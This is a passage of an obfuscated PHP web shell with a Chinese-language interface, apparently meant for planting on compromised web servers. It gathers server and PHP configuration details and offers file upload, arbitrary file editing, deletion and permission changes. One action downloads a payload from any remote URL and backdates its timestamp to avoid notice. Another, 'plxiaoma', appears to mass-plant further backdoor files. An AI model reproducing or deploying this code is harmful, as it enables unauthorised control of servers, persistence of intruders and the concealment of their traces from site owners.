     .tables td {\r\n                #background: #ffffff;\r\n                height: 19px;\r\n                padding-left: 2px;\r\n                border-width: 0px;\r\n                border-style: solid;\r\n                border-color: #FFF;\r\n                border-bottom: 1px solid #eee;\r\n            }\r\n\r\n            .bg{\r\n                width:100%;\r\n                height:100%;\r\n                left:0;\r\n                top:0;\r\n                position:fixed;\r\n                background:rgba(0,0,0,0.3);\r\n              }\r\n              .point{\r\n                position:absolute;\r\n                left:50%;\r\n                top:50%;\r\n              }\r\n              .pop{\r\n                width:500px; \r\n                // height:500px; \r\n                position:absolute;\r\n                left:-250px; \r\n                top:-250px; \r\n                border: 2px solid #f7f7f7;\r\n                background-color: #FFF;\r\n                border-radius:10px;\r\n              }\r\n\r\n              .pop-title{\r\n                height: 40px;\r\n                line-height: 40px;\r\n                text-align: center;\r\n                font-size: 14px;\r\n              }\r\n\r\n\r\n              .layui-textarea{\r\n                min-height: 100px;\r\n                height: auto;\r\n                line-height: 20px;\r\n                padding: 6px 10px;\r\n                resize: vertical;\r\n                display: block;\r\n                width: 95%;\r\n                border-width: 1px;\r\n                border-style: solid;\r\n                background-color: #fff;\r\n                border-radius: 2px;\r\n                border-color: #eee;\r\n              }\r\n\r\n              .layui-btn {\r\n                display: inline-block;\r\n                height: 38px;\r\n                line-height: 38px;\r\n                padding: 0 18px;\r\n                border: 1px solid transparent;\r\n                background-color: #009688;\r\n                color: #fff;\r\n                white-space: nowrap;\r\n                text-align: center;\r\n                font-size: 14px;\r\n                border-radius: 2px;\r\n                cursor: pointer;\r\n            }\r\n\r\n            .btn{\r\n                background-color:#FFF;\r\n                border-color: #d2d2d2;\r\n                color:#666;\r\n            }\r\n\r\n            tr{\r\n                height: 24px;\r\n                line-height: 24px;\r\n            }\r\n            tr:hover{\r\n                background-color: #f2f2f2 !important;\r\n            }\r\n        </style>\r\n\r\n        <script type=\"text/javascript\">\r\n            function \$(ID) {\r\n                return document.getElementById(ID);\r\n            }\r\n\r\n            function sd(str) {\r\n                str = str.replace(/%22/g, '\"');\r\n                str = str.replace(/%27/g, \"'\");\r\n                return str;\r\n            }\r\n\r\n            function cd(dir) {\r\n                dir = sd(dir);\r\n                \$('dir').value = dir;\r\n                \$('frm').submit();\r\n            }\r\n\r\n            function sa(form) {\r\n                for (var i = 0; i < form.elements.length; i++) {\r\n                    var e = form.elements[i];\r\n                    if (e.type == 'checkbox') {\r\n                        if (e.name != 'chkall') {\r\n                            e.checked = form.chkall.checked;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n\r\n            function go(a, b) {\r\n                b = sd(b);\r\n                \$('go').value = a;\r\n                \$('govar').value = b;\r\n                if (a == 'editor') {\r\n                    \$('gofrm').target = \"_blank\";\r\n                } else {\r\n                    \$('gofrm').target = \"\";\r\n                }\r\n                \$('gofrm').submit();\r\n            }\r\n\r\n            function nf(a, b) {\r\n                re = prompt(\"新建名\", b);\r\n                if (re) {\r\n                    \$('go').value = a;\r\n                    \$('govar').value = re;\r\n                    \$('gofrm').submit();\r\n                }\r\n            }\r\n\r\n            function dels(a) {\r\n                if (a == 'b') {\r\n                    var msg = \"所选文件\";\r\n                    \$('act').value = a;\r\n                } else {\r\n                    var msg = \"目录\";\r\n                    \$('act').value = 'deltree';\r\n                    \$('var').value = a;\r\n                }\r\n                if (confirm(\"确定要删除\" + msg + \"吗\")) {\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function txts(m, p, a) {\r\n                p = sd(p);\r\n                re = prompt(m, p);\r\n                if (re) {\r\n                    \$('var').value = re;\r\n                    \$('act').value = a;\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function pltexts(m, p, a)\r\n            {\r\n                p = sd(p);\r\n                // re = prompt(m, p);\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"\";\r\n\r\n                var title = document.getElementsByClassName(\"pop-title\")[0];\r\n                title.innerHTML = m;\r\n\r\n                \$('act').value = a;\r\n            }\r\n\r\n            function pop_submit(){\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"none\";\r\n\r\n                \$('var').value = document.getElementById(\"content\").value;\r\n                \$('frm1').submit();\r\n            }\r\n\r\n            function pop_quxiao(){\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"none\";\r\n            }\r\n\r\n            function acts(p, a, f) {\r\n                p = sd(p);\r\n                f = sd(f);\r\n                re = prompt(f, p);\r\n                if (re) {\r\n                    \$('var').value = re + '|x|' + f;\r\n                    \$('act').value = a;\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function runcode(){\r\n                var html = document.getElementById('show');\r\n                html.style.display= \"\";\r\n            }\r\n        </script>\r\n        <title>{VERSION}</title>\r\n    </head>\r\n<body>\r\n<div class=\"main\">\r\n    <div class=\"outl\">\r\n        <div class=\"toptag\">\r\n            {toptag}\r\n        </div>\r\n        \r\n        <div class=\"tag\">\r\n            {tag}\r\n        </div>\r\n\r\n        <form name=\"gofrm\" id=\"gofrm\" method=\"POST\">\r\n            {input}\r\n            <input type=\"hidden\" name=\"go\" id=\"go\" value=\"\">\r\n            <input type=\"hidden\" name=\"godir\" id=\"godir\" value=\"{nowdir}\">\r\n            <input type=\"hidden\" name=\"govar\" id=\"govar\" value=\"\">\r\n        </form>\r\n\r\n        {content}\r\n\r\n        <div class=\"footag\">\r\n            {footag}\r\n        </div>\r\n    </div>\r\n</div>\r\n\r\n<div class=\"showhtml\" id = \"showhtml\">\r\n{showhtml}\r\n</div>\r\n\r\n<div class=\"bg\" style=\"display:none;\">\r\n    <div class=\"point\">\r\n        <div class=\"pop\">\r\n            <div class=\"pop-title\"></div>\r\n            <textarea class=\"layui-textarea\" id=\"content\" name=\"content\" rows=\"6\"></textarea>\r\n            <div style=\"margin-top: 10px;text-align: center;\">\r\n                <button type=\"button\" class=\"layui-btn\" onclick=\"pop_submit()\">确定</button> \r\n                <button type=\"button\" class=\"layui-btn btn quxiao-btn\" onclick=\"pop_quxiao()\">取消</button>\r\n            </div>\r\n            </br>\r\n        </div>\r\n    </div>\r\n</div>\r\n\r\n</body>\r\n</html>";
        $QSO8f = str_replace("{showhtml}", '', $QSO8f);
        $QSO8f = str_replace("{VERSION}", $this->getVersion(), $QSO8f);
        $QSO8f = str_replace("{toptag}", $this->Np5Yk(), $QSO8f);
        $QSO8f = str_replace("{tag}", $this->EoT_6(), $QSO8f);
        $QSO8f = str_replace("{input}", AxTtQ(), $QSO8f);
        $QSO8f = str_replace("{nowdir}", $this->ddguj, $QSO8f);
        $QSO8f = str_replace("{content}", $this->getContent(), $QSO8f);
        $QSO8f = str_replace("{footag}", php_uname() . " " . $_SERVER["SERVER_SOFTWARE"], $QSO8f);
        echo $QSO8f;
    }
    public function getVersion()
    {
        return "梦想成就未来";
    }
    public function NP5Yk()
    {
        return "版本:DM." . NMW2Y . " | IP:" . ($_SERVER["SERVER_ADDR"] ? $_SERVER["SERVER_ADDR"] . PHP_EOL : gethostbyname($_SERVER["SERVER_NAME"])) . " | whoami(" . get_current_user() . ") |【uid(" . getmyuid() . ") gid(" . getmygid() . ")】" . " |【" . date("Y-m-d H:i:s 星期N", time()) . "】";
    }
    public function eOt_6()
    {
        $oPhqF = array("file" => "文件管理", "scan" => "搜索文件", "info" => "系统信息");
        $JqKaG = !empty($_POST["go"]) && array_key_exists($_POST["go"], $oPhqF) ? $_POST["go"] : "file";
        $Jzwra = $this->ddguj;
        $QSO8f = '';
        foreach ($oPhqF as $iW8f4 => $Kes_q) {
            $QSO8f .= "<a" . ($JqKaG == $iW8f4 ? " class=\"current\"" : '') . " href=\"javascript:go('" . $iW8f4 . "','" . base64_encode($Jzwra) . "');\">" . $Kes_q . "</a> ";
        }
        return $QSO8f;
    }
    public function getContent()
    {
        $JqKaG = isset($_POST["go"]) ? $_POST["go"] : '';
        switch ($JqKaG) {
            case "info":
                return $this->jaT27();
                break;
            case "scan":
                return $this->Ikqbc();
                break;
            case "upfiles":
                return $this->hVvwe();
                break;
            case "edit":
            case "editor":
                return $this->i7u03();
                break;
            default:
                return $this->J0I1Z();
                break;
        }
    }
    public function JAT27()
    {
        $UgLz_ = '';
        $QSO8f = '';
        if (true) {
            ob_start();
            phpinfo(INFO_GENERAL);
            $QjGuH = ob_get_contents();
            ob_end_clean();
            $eMzvo = array();
            preg_match_all("/\\<td class\\=\\\"e\\\"\\>.*?(Command|Configuration)+.*?\\<\\/td\\>\\<td class\\=\\\"v\\\"\\>(.*?)\\<\\/td\\>/i", $QjGuH, $eMzvo);
            $jZi_a = $eMzvo[2][0];
            $krJKZ = $eMzvo[2][2] ? $eMzvo[2][1] . " --- " . $eMzvo[2][2] : $eMzvo[2][1];
        }
        $Tns_w = array("客户端浏览器信息" => $_SERVER["HTTP_USER_AGENT"], "被禁用的函数" => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : "(无)", "被禁用的类" => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : "(无)", "PHP.ini配置路径" => $krJKZ ? $krJKZ : "(无)", "PHP运行方式" => php_sapi_name(), "PHP版本" => PHP_VERSION, "PHP进程PID" => getmypid(), "客户端IP" => $_SERVER["REMOTE_ADDR"], "客户端文字编码" => $_SERVER["HTTP_ACCEPT_LANGUAGE"], "Web服务端口" => $_SERVER["SERVER_PORT"], "Web根目录" => $_SERVER["DOCUMENT_ROOT"], "Web执行脚本" => $_SERVER["SCRIPT_FILENAME"], "Web规范CGI版本" => $_SERVER["GATEWAY_INTERFACE"], "Web管理员Email" => !empty($_SERVER["SERVER_ADMIN"]) ? $_SERVER["SERVER_ADMIN"] : "(无)", "当前磁盘总大小" => iDYfR(disk_total_space(".")), "当前磁盘可用空间" => iDYFR(disk_free_space(".")), "POST最大字数量" => get_cfg_var("post_max_size"), "允许最大上传文件" => get_cfg_var("upload_max_filesize"), "程序最大使用内存量" => get_cfg_var("memory_limit"), "程序最长运行时间" => get_cfg_var("max_execution_time") . "秒", "是否支持Fsockopen" => function_exists("fsockopen") ? "是" : "否", "是否支持Socket" => function_exists("uJGdY") ? "是" : "否", "是否支持Pcntl" => function_exists("T2RBU") ? "是" : "否", "是否支持Curl" => function_exists("curl_version") ? "是" : "否", "是否支持Zlib" => function_exists("gzclose") ? "是" : "否", "是否支持FTP" => function_exists("bd6g6") ? "是" : "否", "是否支持XML" => function_exists("xml_set_object") ? "是" : "否", "是否支持GD_Library" => function_exists("m4WLg") ? "是" : "否", "是否支持COM组建" => class_exists("COM") ? "是" : "否", "是否支持ODBC组建" => function_exists("c0ZET") ? "是" : "否", "是否支持IMAP邮件" => function_exists("ClbJp") ? "是" : "否", "是否运行于安全模式" => get_cfg_var("safemode") ? "是" : "否", "是否允许URL打开文件" => get_cfg_var("allow_url_fopen") ? "是" : "否", "是否允许动态加载链接库" => get_cfg_var("enable_dl") ? "是" : "否", "是否显示错误信息" => get_cfg_var("display_errors") ? "是" : "否", "是否自动注册全局变量" => get_cfg_var("register_globals") ? "是" : "否", "是否使用反斜线引用字符串" => get_cfg_var("magic_quotes_gpc") ? "是" : "否", "PHP编译参数" => $jZi_a ? $jZi_a : "(无)");
        $QSO8f .= "<div class=\"msgbox\">" . $UgLz_ . "</div>";
        $QSO8f .= "<table class=\"tables\"><tr><th style=\"width:26%;\">名称</th><th>参数</th></tr>";
        foreach ($Tns_w as $Kes_q => $KPtbK) {
            $QSO8f .= "<tr><td>" . $Kes_q . "</td><td>" . $KPtbK . "</td></tr>";
        }
        $QSO8f .= "</table>";
        return $QSO8f;
    }
    public function IkQbC()
    {
        $Jzwra = $this->ddguj;
        $UgLz_ = '';
        $UlicF = empty($_POST["dir"]) ? base64_decode($_POST["govar"]) : $Jzwra;
        $xsz7E = isset($_POST["keyword"]) ? $_POST["keyword"] : '';
        $qGL_P = isset($_POST["include"]) ? chop($_POST["include"]) : ".php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py";
        $kKCOC = isset($_POST["filters"]) ? chop($_POST["filters"]) : "html|css|img|images|image|style|js";
        $QSO8f = '';
        $QSO8f .= "<div class=\"msgbox\">" . $UgLz_ . "</div>";
        $QSO8f .= "<form method=\"POST\">";
        $QSO8f .= axtTQ();
        $QSO8f .= "<input type=\"hidden\" name=\"go\" id=\"go\" value=\"scan\">";
        $QSO8f .= "<table class=\"tables\"><tr><th style=\"width:15%;\">名称</th><th>设置</th></tr>";
        $QSO8f .= "<tr><td>搜索路径</td><td><input type=\"text\" name=\"dir\" value=\"" . htmlspecialchars($UlicF) . "\" style=\"width:500px;\"></td></tr>";
        $QSO8f .= "<tr><td>搜索内容</td><td><input type=\"text\" name=\"keyword\" value=\"" . htmlspecialchars($xsz7E) . "\" style=\"width:500px;\"> (文件名或文件内容)</td></tr>";
        $QSO8f .= "<tr><td>文件后缀</td><td><input type=\"text\" name=\"include\" value=\"" . htmlspecialchars($qGL_P) . "\" style=\"width:500px;\"> (用\"|\"分割, 为空则搜索所有文件)</td></tr>";
        $QSO8f .= "<tr><td>过滤目录</td><td><input type=\"text\" name=\"filters\" value=\"" . htmlspecialchars($kKCOC) . "\" style=\"width:500px;\"> (用\"|\"分割, 为空则不过滤目录)</td></tr>";
        $QSO8f .= "<tr><td>搜索方式</td><td><label><input type=\"radio\" name=\"type\" value=\"0\"" . (!empty($_POST["type"]) ? '' : " checked") . ">搜索文件名</label> ";
        $QSO8f .= "<label><input type=\"radio\" name=\"type\" value=\"1\"" . (!empty($_POST["type"]) ? " checked" : '') . ">搜索包含文字</label> ";
        $QSO8f .= "<label><input type=\"checkbox\" name=\"char\" value=\"1\"" . (!empty($_POST["char"]) ? " checked" : '') . ">匹配大小写</label></td></tr>";
        $QSO8f .= "<tr><td>搜索范围</td><td><label><input type=\"radio\" name=\"range\" value=\"0\"" . (!empty($_POST["range"]) ? '' : " checked") . ">将搜索应用于该文件夹,子文件夹和文件</label> ";
        $QSO8f .= "<label><input type=\"radio\" name=\"range\" value=\"1\"" . (!empty($_POST["range"]) ? " checked" : '') . ">仅将搜索应用于该文件夹</label></td></tr>";
        $QSO8f .= "<tr><td>操作</td><td><input type=\"submit\" style=\"width:80px;\" value=\"搜索\"></td></tr>";
        $QSO8f .= "</table></form>";
        if ($xsz7E != '') {
            flush();
            ob_flush();
            $QSO8f .= "<div style=\"padding:5px;background:#F8F8F8;text-align:left;\">";
            $t6SOR = $qGL_P == '' ? false : explode("|", $qGL_P);
            $x98RS = $kKCOC == '' ? false : explode("|", $kKCOC);
            $E56um = dqR9R(pBm07($UlicF . "/"), $xsz7E, $t6SOR, $x98RS, !empty($_POST["type"]) ? $_POST["type"] : '', !empty($_POST["char"]) ? $_POST["char"] : '', !empty($_POST["range"]) ? $_POST["range"] : '', $Jzwra);
            $QSO8f .= $E56um;
            $QSO8f .= "<p>" . ($E56um ? "<h2>搜索完成</h2>" : "<h1>搜索失败</h1>") . "</p></div>";
        }
        return $QSO8f;
    }
    public function HvVwE()
    {
        $trx7n = isset($_POST["updir"]) ? $_POST["updir"] : $_POST["godir"];
        $UgLz_ = "【最大上传文件 " . get_cfg_var("upload_max_filesize") . "】 【POST最大提交数据 " . get_cfg_var("post_max_size") . "】";
        $yklRt = 10;
        $JGN3j = array();
        if (isset($_FILES["uploads"]) && isset($_POST["renames"])) {
            $TQlLa = $_FILES["uploads"];
            $uLtTd = 1;
            while ($uLtTd < $yklRt) {
                if ($TQlLa["error"][$uLtTd] == UPLOAD_ERR_OK) {
                    $QY5ao = $_POST["renames"][$uLtTd] == '' ? $TQlLa["name"][$uLtTd] : $_POST["renames"][$uLtTd];
                    $zi0Y0 = $TQlLa["tmp_name"][$uLtTd];
                    $J3Hov = pBM07($trx7n . "/" . $QY5ao);
                    $JGN3j[$uLtTd] = FIvrg($zi0Y0, $J3Hov) ? "<br><h2>上传成功 " . $QY5ao . "</h2>" : "<br><h1>上传失败 " . $QY5ao . "</h1>";
                }
                $uLtTd++;
            }
        }
        $QSO8f = '';
        $QSO8f .= "<div class=\"msgbox\">" . $UgLz_ . "</div>";
        $QSO8f .= "<form name=\"upsfrm\" id=\"upsfrm\" method=\"POST\" enctype=\"multipart/form-data\">";
        $QSO8f .= AxTtQ();
        $QSO8f .= "<input type=\"hidden\" name=\"go\" value=\"upfiles\"><input type=\"hidden\" name=\"act\" id=\"act\" value=\"upload\">";
        $QSO8f .= "<div class=\"actall\"><p>上传到目录 <input type=\"text\" name=\"updir\" style=\"width:398px;\" value=\"" . $trx7n . "\"></p>";
        $uLtTd = 1;
        while ($uLtTd < $yklRt) {
            $QSO8f .= "<p>附件" . $uLtTd . " <input type=\"file\" name=\"uploads[" . $uLtTd . "]\" style=\"width:300px;\"> 重命名 <input type=\"text\" name=\"renames[" . $uLtTd . "]\" style=\"width:128px;\"> " . (!empty($JGN3j[$uLtTd]) ? $JGN3j[$uLtTd] : '') . "</p>";
            $uLtTd++;
        }
        $QSO8f .= "</div></form><div class=\"actall\" style=\"padding:8px;padding-right:68px;\"><input type=\"button\" onclick=\"\$('upsfrm').submit();\" value=\"上传\" style=\"width:80px;\"> ";
        $QSO8f .= "<form name=\"backfrm\" id=\"backfrm\" method=\"POST\"><input type=\"hidden\" name=\"go\" value=\"\"><input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . $trx7n . "\">";
        $QSO8f .= AXtTQ();
        $QSO8f .= "<input type=\"button\" onclick=\"\$('backfrm').submit();\" value=\"返回\" style=\"width:80px;\"></form></div>";
        return $QSO8f;
    }
    public function I7U03()
    {
        $SFJ9z = pbm07($_POST["godir"] . "/" . $_POST["govar"]);
        $YM_6j = function_exists("iconv");
        $tAe0C = '';
        $uS2nL = '';
        if (!file_exists($SFJ9z)) {
            $UgLz_ = "【新建文件】";
        } else {
            $uS2nL = file_get_contents($SFJ9z);
            $tAe0C = "默认";
            $T3WIB = IDyfR(filesize($SFJ9z));
            $UgLz_ = "【文件属性 " . substr(decoct(fileperms($SFJ9z)), -4) . "】 【文件大小 " . $T3WIB . "】 【文件编码 " . $tAe0C . "】";
        }
        $QSO8f = '';
        $QSO8f .= "        <script src=\"https://cdn.bootcss.com/ace/1.4.6/ace.js\"></script>\r\n        <script src=\"https://cdn.bootcss.com/ace/1.4.6/ext-beautify.js\"></script>\r\n        <script src=\"https://cdn.bootcss.com/ace/1.4.6/ext-language_tools.js\"></script>\r\n        <script src=\"https://cdn.bootcss.com/ace/1.4.6/mode-javascript.js\"></script>\r\n        <script src=\"https://cdn.bootcss.com/ace/1.4.6/theme-xcode.js\"></script>";
        $QSO8f .= "<form name=\"editfrm\" id=\"editfrm\" method=\"POST\">";
        $QSO8f .= AXtTq();
        $QSO8f .= "<input type=\"hidden\" name=\"go\" value=\"\"><input type=\"hidden\" name=\"act\" id=\"act\" value=\"edit\">";
        $QSO8f .= "<input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . dirname($SFJ9z) . "\">";
        $QSO8f .= "<div class=\"actall\">文件 <input type=\"text\" name=\"filename\" value=\"" . $SFJ9z . "\" style=\"width:528px;\"> ";
        if ($YM_6j) {
            $QSO8f .= "编码 <select name=\"tostr\">";
            $I8314 = array("normal" => "默认", "utf" => "utf-8");
            foreach ($I8314 as $KPtbK => $Kes_q) {
                $QSO8f .= "<option value=\"" . $KPtbK . "\"" . ($Kes_q == $tAe0C ? " selected" : '') . ">" . $Kes_q . "</option>";
            }
            $QSO8f .= "</select>";
        }
        $QSO8f .= "</div><div class=\"actall\">";
        $QSO8f .= "<input type=\"hidden\" name=\"filecode\" id=\"filecode\" value=\"\">";
        $QSO8f .= "<pre id=\"phpcode\" class=\"ace_editor\" style=\"min-height:500px\"><textarea class=\"ace_text-input\" style=\"width:698px;height:500px;\">" . $uS2nL . "</textarea></pre>";
        $QSO8f .= "</div></form>";
        $QSO8f .= "<div class=\"actall\" style=\"padding:5px;padding-right:68px;\"><input type=\"button\" onclick=\"editSubmit()\" value=\"保存\" style=\"width:80px;\"> ";
        $QSO8f .= "<form name=\"backfrm\" id=\"backfrm\" method=\"POST\"><input type=\"hidden\" name=\"go\" value=\"\"><input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . dirname($SFJ9z) . "\">";
        $QSO8f .= AxtTq();
        $QSO8f .= "<input type=\"button\" onclick=\"\$('backfrm').submit();\" value=\"返回\" style=\"width:80px;\"></form></div>";
        $QSO8f .= "        <script>\r\n            //初始化对象\r\n            editor = ace.edit(\"phpcode\");\r\n            editor.setTheme(\"ace/theme/monokai\");//引入模板\r\n            editor.session.setMode(\"ace/mode/php\");//设置php\r\n            editor.setFontSize(14); //字体大小\r\n            document.getElementById(\"phpcode\").style.lineHeight=\"18px\";//设置行高;\r\n            editor.setReadOnly(false);//设置只读(true时只读,用于展示代码)\r\n            //自动换行,设置为off关闭\r\n            editor.setOption(\"wrap\", \"free\");\r\n            //启用提示菜单\r\n            ace.require(\"ace/ext/language_tools\");\r\n            //以下部分是设置输入代码提示的\r\n            editor.setOptions({\r\n                enableBasicAutocompletion: true,\r\n                enableSnippets: true,\r\n                enableLiveAutocompletion: true\r\n            });\r\n            editor.setHighlightActiveLine(true); //代码高亮\r\n            editor.setShowPrintMargin(false);//设置打印线是否显示\r\n            editor.getSession().setUseWorker(false); //设置只读\r\n            editor.getSession().setUseWrapMode(true); //支持代码折叠\r\n            //editor.getSession().setMode('ace/mode/javascript'); //设置语言模式\r\n            editor.selection.getCursor(); //获取光标所在行或列\r\n            //editor.gotoLine(lineNumber); //跳转到行\r\n            editor.session.getLength(); //获取总行数\r\n            editor.getSession().setUseSoftTabs(true);\r\n\r\n            function editSubmit()\r\n            {\r\n                document.getElementById(\"filecode\").value = editor.getValue();\r\n                \$('editfrm').submit();\r\n            }\r\n        </script>";
        return $QSO8f;
    }
    public function J0I1z()
    {
        $Jzwra = $this->ddguj;
        $UgLz_ = '';
        $JqKaG = isset($_POST["go"]) ? $_POST["go"] : '';
        if ($JqKaG == "down") {
            $x3CQ0 = $J3Hov = pBm07($_POST["godir"] . "/" . $_POST["govar"]);
            if (!VZO7E($x3CQ0)) {
                $UgLz_ = "<h1>下载文件不存在</h1>";
            }
        }
        if (isset($_FILES["upfile"])) {
            if ($_FILES["upfile"]["name"] == '') {
                $UgLz_ = "<h1>请选择文件</h1>";
            } else {
                $QY5ao = $_POST["rename"] == '' ? $_FILES["upfile"]["name"] : $_POST["rename"];
                $zi0Y0 = $_FILES["upfile"]["tmp_name"];
                $J3Hov = pBM07($Jzwra . $QY5ao);
                $UgLz_ = fivrG($zi0Y0, $J3Hov) ? "<h2>上传文件" . $QY5ao . "成功</h2>" : "<h1>上传文件" . $QY5ao . "失败</h1>";
            }
        }
        if (isset($_POST["act"])) {
            switch ($_POST["act"]) {
                case "a":
                    if (!$_POST["files"]) {
                        $UgLz_ = "<h1>请选择文件 " . $_POST["var"] . "</h1>";
                    } else {
                        $uLtTd = 0;
                        foreach ($_POST["files"] as $eb_7J) {
                            $uLtTd += @copy(pBm07($Jzwra . $eb_7J), Pbm07($_POST["var"] . "/copy_" . $eb_7J)) ? 1 : 0;
                        }
                        $UgLz_ = $UgLz_ = $uLtTd ? "<h2>共复制 " . $uLtTd . " 个文件到" . $_POST["var"] . "成功</h2>" : "<h1>共复制 " . $uLtTd . " 个文件到" . $_POST["var"] . "失败</h1>";
                    }
                    break;
                case "b":
                    if (!$_POST["files"]) {
                        $UgLz_ = "<h1>请选择文件</h1>";
                    } else {
                        $uLtTd = 0;
                        foreach ($_POST["files"] as $eb_7J) {
                            $uLtTd += @unlink(pbm07($Jzwra . $eb_7J)) ? 1 : 0;
                        }
                        $UgLz_ = $uLtTd ? "<h2>共删除 " . $uLtTd . " 个文件成功</h2>" : "<h1>共删除 " . $uLtTd . " 个文件失败</h1>";
                    }
                    break;
                case "c":
                    if (!$_POST["files"]) {
                        $UgLz_ = "<h1>请选择文件 " . $_POST["var"] . "</h1>";
                    } else {
                        if (!preg_match("/[0-7]{4}\$/", $_POST["var"])) {
                            $UgLz_ = "<h1>属性值错误</h1>";
                        } else {
                            $uLtTd = 0;
                            foreach ($_POST["files"] as $eb_7J) {
                                try {
                                    $uLtTd += @chmod(PbM07($Jzwra . $eb_7J), base_convert($_POST["var"], 8, 10)) ? 1 : 0;
                                } catch (Throwable $yVbeC) {
                                }
                            }
                            $UgLz_ = $uLtTd ? "<h2>共 " . $uLtTd . " 个文件修改属性为" . $_POST["var"] . "成功</h2>" : "<h1>共 " . $uLtTd . " 个文件修改属性为" . $_POST["var"] . "失败</h1>";
                        }
                    }
                    break;
                case "d":
                    if (!$_POST["files"]) {
                        $UgLz_ = "<h1>请选择文件 " . $_POST["var"] . "</h1>";
                    } else {
                        if (!preg_match("/(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+):(\\d+)/", $_POST["var"])) {
                            $UgLz_ = "<h1>时间格式错误 " . $_POST["var"] . "</h1>";
                        } else {
                            $uLtTd = 0;
                            foreach ($_POST["files"] as $eb_7J) {
                                $uLtTd += @touch(pbm07($Jzwra . $eb_7J), strtotime($_POST["var"])) ? 1 : 0;
                            }
                            $UgLz_ = $uLtTd ? "<h2>共 " . $uLtTd . " 个文件修改时间为" . $_POST["var"] . "成功</h2>" : "<h1>共 " . $uLtTd . " 个文件修改时间为" . $_POST["var"] . "失败</h1>";
                        }
                    }
                    break;
                case "e":
                    $PfRvL = PbM07($Jzwra . $_POST["var"] . "/");
                    if (file_exists($PfRvL)) {
                        $UgLz_ = "<h1>目录已存在 " . $_POST["var"] . "</h1>";
                    } else {
                        $UgLz_ = @mkdir($PfRvL, 0777) ? "<h2>创建目录 " . $_POST["var"] . " 成功</h2>" : "<h1>创建目录 " . $_POST["var"] . " 失败</h1>";
                    }
                    break;
                case "f":
                    $rINXt = array("http" => array("timeout" => 30));
                    if (function_exists("stream_context_create")) {
                        $KlQ6w = stream_context_create($rINXt);
                    }
                    $dRqNZ = explode(" ", $_POST["var"]);
                    $s5r3y = @file_get_contents($dRqNZ[0], false, $KlQ6w);
                    $kojAr = explode("/", $dRqNZ[0]);
                    $eb_7J = array_pop($kojAr);
                    if (!empty($dRqNZ[1])) {
                        $eb_7J = $dRqNZ[1];
                    }
                    if ($s5r3y) {
                        if (LGU3J(pbM07($Jzwra . $eb_7J), $s5r3y, "wb")) {
                            $YJnbr = c4GHr($Jzwra);
                            $ipdt9 = 0;
                            if (!empty($YJnbr["file"])) {
                                foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                                    if (!$ipdt9) {
                                        $ipdt9 = filemtime($cT1oz);
                                    } else {
                                        if (filemtime($cT1oz) < $ipdt9) {
                                            $ipdt9 = filemtime($cT1oz);
                                        }
                                    }
                                }
                            }
                            if ($ipdt9) {
                                @touch(PBM07($Jzwra . $eb_7J), $ipdt9);
                            }
                            chmod(PbM07($Jzwra . $eb_7J), 0755);
                            $UgLz_ = "<h2>下载 " . $eb_7J . " 成功</h2>";
                        } else {
                            "<h1>下载 " . $eb_7J . " 失败</h1>";
                        }
                    } else {
                        $UgLz_ = "<h1>下载失败或不支持下载</h1>";
                    }
                    break;
                case "rf":
                    $kojAr = explode("|x|", $_POST["var"]);
                    if (count($kojAr) != 2) {
                        $UgLz_ = "<h1>输入错误</h1>";
                    } else {
                        $UgLz_ = @rename(PbM07($Jzwra . $kojAr[1]), PbM07($Jzwra . $kojAr[0])) ? "<h2>重命名 " . $kojAr[1] . " 为 " . $kojAr[0] . " 成功</h2>" : "<h1>重命名 " . $kojAr[1] . " 为 " . $kojAr[0] . " 失败</h1>";
                    }
                    break;
                case "pd":
                    $kojAr = explode("|x|", $_POST["var"]);
                    if (count($kojAr) != 2) {
                        $UgLz_ = "<h1>输入错误</h1>";
                    } else {
                        $PfRvL = PBM07($Jzwra . $kojAr[1]);
                        try {
                            @chmod($PfRvL, base_convert($kojAr[0], 8, 10));
                            $QRlUz = true;
                        } catch (Throwable $yVbeC) {
                            $QRlUz = false;
                        }
                        $UgLz_ = $QRlUz ? "<h2>修改" . $kojAr[1] . "属性为" . $kojAr[0] . "成功</h2>" : "<h1>修改" . $kojAr[1] . "属性为" . $kojAr[0] . "失败</h1>";
                    }
                    break;
                case "edit":
                    if (!(isset($_POST["filename"]) && isset($this->N5qPH["filecode"]))) {
                    } else {
                        $UgLz_ = lgU3J($_POST["filename"], $this->N5qPH["filecode"], "w") ? "<h2>保存成功 " . $_POST["filename"] . "</h2>" : "<h1>保存失败 " . $_POST["filename"] . "</h1>";
                    }
                    break;
                case "deltree":
                    $C3hpU = pBM07($Jzwra . $_POST["var"] . "/");
                    if (!file_exists($C3hpU)) {
                        $UgLz_ = "<h1>目录 " . $_POST["var"] . " 不存在</h1>";
                    } else {
                        $UgLz_ = mRf0Q($C3hpU) ? "<h2>删除目录 " . $_POST["var"] . " 成功</h2>" : "<h1>删除目录 " . $_POST["var"] . " 失败</h1>";
                    }
                    break;
                case "plxiaoma":
                    $PfRvL = rtrim($_POST["dir"], "/");
                    $kojAr = explode("\n", trim($_POST["var"]));
                    $kFQIU = array();
                    if ($kojAr) {
                        $YJnbr = c4gHr($PfRvL);
                        $ipdt9 = 0;
                        if (!empty($YJnbr["file"])) {
                            foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                                if (!$ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                } else {
                                    if (filemtime($cT1oz) < $ipdt9) {
                                        $ipdt9 = filemtime($cT1oz);
                                    }
                                }
                            }
                        }
                        foreach ($kojAr as $Hzx0E) {
                            $Hzx0E = trim($Hzx0E);
                            $xNX14 = explode("/", $PfRvL . "/" . $Hzx0E);
                            $eb_7J = array_pop($xNX14);
                            $xNX14 = implode("/", $xNX14);
                            if (!file_exists($xNX14)) {
